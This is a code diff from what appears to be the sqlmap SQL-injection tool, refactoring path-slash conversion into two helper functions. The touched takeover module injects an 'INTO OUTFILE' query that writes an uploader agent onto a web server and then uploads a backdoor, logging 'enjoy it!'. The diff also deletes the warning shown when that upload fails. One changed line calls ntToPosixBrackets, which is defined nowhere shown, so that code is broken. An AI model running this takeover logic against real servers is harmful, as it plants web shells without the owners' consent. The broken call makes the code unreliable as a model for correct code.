diff --git a/lib/core/common.py b/lib/core/common.py index 46ecdfb8f..625ca097d 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -236,15 +236,15 @@ def getDocRoot(): absFilePathWin = None if isWindowsPath(absFilePath): - absFilePathWin = absFilePath.replace("/", "\\") - absFilePath = absFilePath[2:].replace("\\", "/") + absFilePathWin = posixToNtSlashes(absFilePath) + absFilePath = ntToPosixSlashes(absFilePath[2:]) if pagePath in absFilePath: index = absFilePath.index(pagePath) docRoot = absFilePath[:index] if absFilePathWin: - docRoot = "C:/%s" % docRoot.replace("\\", "/") + docRoot = "C:/%s" % ntToPosixSlashes(docRoot) docRoot = normalizePath(docRoot) break @@ -908,3 +908,9 @@ def decloakToMkstemp(filepath, **kwargs): def isWindowsPath(filepath): return re.search("\A[A-Za-z]:", filepath) is not None + +def posixToNtSlashes(filepath): + return filepath.replace('/', '\\') + +def ntToPosixSlashes(filepath): + return filepath.replace('\\', '/') diff --git a/lib/core/option.py b/lib/core/option.py index 2e658bf64..bd83149c6 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -35,6 +35,7 @@ import urlparse from ConfigParser import ConfigParser from lib.core.common import getFileType +from lib.core.common import ntToPosixSlashes from lib.core.common import parseTargetUrl from lib.core.common import paths from lib.core.common import randomRange @@ -903,19 +904,19 @@ def __cleanupOptions(): conf.delay = float(conf.delay) if conf.rFile: - conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/")) + conf.rFile = os.path.normpath(ntToPosixSlashes(conf.rFile)) if conf.wFile: - conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/")) + conf.wFile = os.path.normpath(ntToPosixSlashes(conf.wFile)) if conf.dFile: - conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/")) + conf.dFile = os.path.normpath(ntToPosixSlashes(conf.dFile)) if conf.msfPath: - conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/")) + conf.msfPath = os.path.normpath(ntToPosixSlashes(conf.msfPath)) if conf.tmpPath: - conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/")) + conf.tmpPath = os.path.normpath(ntToPosixSlashes(conf.tmpPath)) if conf.googleDork or conf.list: conf.multipleTargets = True diff --git a/lib/request/basic.py b/lib/request/basic.py index 0d74849c8..1e00ec5f5 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -30,6 +30,7 @@ import zlib from lib.core.common import directoryPath from lib.core.common import isWindowsPath +from lib.core.common import posixToNtSlashes from lib.core.common import urlEncodeCookieValues from lib.core.data import conf from lib.core.data import kb @@ -83,7 +84,7 @@ def parseResponse(page, headers): absFilePath = match.group("result").strip() page = page.replace(absFilePath, "") if isWindowsPath(absFilePath): - absFilePath = absFilePath.replace("/", "\\") + absFilePath = posixToNtSlashes(absFilePath) if absFilePath not in kb.absFilePaths: kb.absFilePaths.add(absFilePath) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 7f94bb864..eaae35597 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -31,8 +31,10 @@ from lib.core.common import decloakToNamedTemporaryFile from lib.core.common import fileToStr from lib.core.common import getDirs from lib.core.common import getDocRoot +from lib.core.common import ntToPosixSlashes from lib.core.common import isWindowsPath from lib.core.common import normalizePath +from lib.core.common import posixToNtSlashes from lib.core.common import readInput from lib.core.convert import hexencode from lib.core.data import conf @@ -90,6 +92,7 @@ class Web: "file": stream, "uploadDir": directory, } + page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams) if "File uploaded" not in page: @@ -174,7 +177,7 @@ class Web: for directory in directories: # Upload the uploader agent outFile = normalizePath("%s/%s" % (directory, uploaderName)) - uplQuery = uploaderContent.replace("WRITABLE_DIR", directory) + uplQuery = uploaderContent.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if kb.os == "Windows" else directory) query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query = agent.prefixQuery(" %s" % query) @@ -182,13 +185,13 @@ class Web: payload = agent.payload(newValue=query) page = Request.queryPage(payload) - requestDir = directory.replace('\\', '/').replace(kb.docRoot.replace('\\', '/'), "/").replace("//", "/") + requestDir = ntToPosixSlashes(directory).replace(ntToPosixBrackets(kb.docRoot), "/").replace("//", "/") if isWindowsPath(requestDir): requestDir = requestDir[2:] requestDir = normalizePath(requestDir) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName) - self.webUploaderUrl = self.webUploaderUrl.replace("./", "/").replace("\\", "/") + self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) if "sqlmap file uploader" not in uplPage: @@ -201,18 +204,16 @@ class Web: infoMsg = "the uploader agent has been successfully uploaded " infoMsg += "on '%s'" % directory logger.info(infoMsg) - + + if kb.os == "Windows": + directory = posixToNtSlashes(directory) + if self.__webFileStreamUpload(backdoorStream, backdoorName, directory): self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = directory - infoMsg = "the backdoor has probably been successfully " infoMsg += "uploaded on '%s', go with your browser " % directory infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl logger.info(infoMsg) - else: - infoMsg = "the backdoor hasn't been successfully " - infoMsg += "uploaded on '%s'" % directory - logger.warn(infoMsg) break diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py index 6422fbf44..1c12195d5 100644 --- a/plugins/dbms/mssqlserver.py +++ b/plugins/dbms/mssqlserver.py @@ -31,6 +31,7 @@ from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp from lib.core.common import getRange +from lib.core.common import posixToNtSlashes from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.convert import urlencode @@ -496,9 +497,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov logger.debug(debugMsg) debugSize = 0xFF00 - tmpPath = conf.tmpPath.replace("/", "\\") + tmpPath = posixToNtSlashes(conf.tmpPath) dFileName = os.path.split(dFile)[1] - dFile = dFile.replace("/", "\\") + dFile = posixToNtSlashes(dFile) wFileSize = os.path.getsize(wFile) wFilePointer = open(wFile, "rb") wFileContent = wFilePointer.read() diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py index 72587692c..98c46aaaa 100644 --- a/plugins/dbms/mysql.py +++ b/plugins/dbms/mysql.py @@ -29,6 +29,7 @@ from lib.core.agent import agent from lib.core.common import formatDBMSfp from lib.core.common import formatFingerprint from lib.core.common import getHtmlErrorFp +from lib.core.common import ntToPosixSlashes from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.data import conf @@ -496,7 +497,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir self.__basedir = inject.getValue("SELECT @@basedir") - self.__basedir = os.path.normpath(self.__basedir.replace("\\", "/")) + self.__basedir = os.path.normpath(ntToPosixSlashes(self.__basedir)) if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I): kb.os = "Windows" @@ -517,7 +518,7 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 self.__datadir = "." - self.__datadir = os.path.normpath(self.__datadir.replace("\\", "/")) + self.__datadir = os.path.normpath(ntToPosixSlashes(self.__datadir)) if re.search("[\w]\:\/", self.__datadir, re.I): kb.os = "Windows" diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index f461651da..154412848 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -25,6 +25,8 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import os import re +from lib.core.common import ntToPosixSlashes +from lib.core.common import posixToNtSlashes from lib.core.common import readInput from lib.core.data import conf from lib.core.data import kb @@ -65,7 +67,7 @@ class Miscellaneous: if re.search("^[\w]\:[\/\\\\]+", conf.tmpPath, re.I): kb.os = "Windows" - conf.tmpPath = conf.tmpPath.replace("\\", "/") + conf.tmpPath = ntToPosixSlashes(conf.tmpPath) conf.tmpPath = os.path.normpath(conf.tmpPath) setRemoteTempPath() @@ -77,7 +79,7 @@ class Miscellaneous: if doubleslash: tempFile = tempFile.replace("/", "\\\\") else: - tempFile = tempFile.replace("/", "\\") + tempFile = posixToNtSlashes(tempFile) cmd = "del /F /Q %s" % tempFile else: